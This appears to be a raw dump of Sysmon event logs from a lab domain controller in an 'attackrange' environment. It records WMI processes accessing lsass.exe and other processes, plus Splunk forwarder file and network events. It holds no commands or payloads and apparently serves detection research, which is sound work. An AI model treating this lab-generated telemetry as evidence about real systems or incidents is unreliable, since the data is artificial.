C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204271Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1300-00000000AD01}896C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204270Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1200-00000000AD01}392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204269Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204268Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1000-00000000AD01}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204267Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204266Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0E00-00000000AD01}1012C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204265Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0D00-00000000AD01}912C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204264Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0C00-00000000AD01}852C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204263Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204262Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0900-00000000AD01}572C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002204261Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.009{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9747569D1AB5CB32F8C477AF9CB56CA,SHA256=9731B841C5D77936F44CF57E398F3235D381CE969C4768FC06025850AE55112B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204260Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.993{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204259Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.993{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 354300x80000000000000002204453Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.017{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60751-false10.0.1.12-8000- 23542300x80000000000000002204452Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:05.368{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=247F08371EFBC25FDF5F37CC30E6B5D5,SHA256=FA2DE7EEEB37D4D7C80BCF4249F9A8EF4D798FC8CA047CBE6586FDDF0CEAC357,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204455Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:06.993{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204454Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:06.384{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45514495CAE5E69FE074181AD0C11AC6,SHA256=99A55AC0C70496F932E681A731868F6B227F31D54E4207D5BA1A3DB56A7DA7C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204456Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:07.400{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8860BEAF11820FD290A4835602CBE2B2,SHA256=08DA88DF91D727C6E1FE33D346BD24702CDA50544F5D14CB153A0CD9091F1A3E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204459Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.814{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60752-false10.0.1.12-8089- 23542300x80000000000000002204458Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:08.415{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8032F7D62E246967AFFC8F7E98A6A8F4,SHA256=1A62FDF611C87CB224DCF59C781BEACE3D224889310315C440F2512DD1C6C380,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204457Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:08.009{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78B1E76DDF80ED836A7EB379BEEC90AF,SHA256=843AC23C6A6C60909DF49FF176F15B1C46FCB3D08565E0800BBF83AF5D14856F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204462Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:09.993{5ABCFE62-842F-603E-0F00-00000000AD01}2962648C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204461Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:09.993{5ABCFE62-842F-603E-0F00-00000000AD01}2962648C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002204460Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:09.431{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09755DFA9ACE3A531CA2574E826BEEFA,SHA256=ED1420512C38E2A463F7D869C124CB65995D25EE0BA3EDE18D476BFAD496B40F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204466Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:07.048{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60753-false10.0.1.12-8000- 23542300x80000000000000002204465Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:10.447{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=704314D1CE61DEC66BF53B9E4DD00FAD,SHA256=59A4517C2E0D8DD0F065E835B0D7F4CB2218D1D4C48035F46B24709D4ADD21EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204464Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:10.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE2AFE66317A8C8025467234122B9960,SHA256=A2A5A32699C86222007E589FED614F0340FA5FBEB37ED526ABFA9C78A7362927,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204463Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:10.072{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-8423-603E-0100-00000000AD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x80000000000000002204470Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:07.908{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60754-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002204469Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:07.908{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT 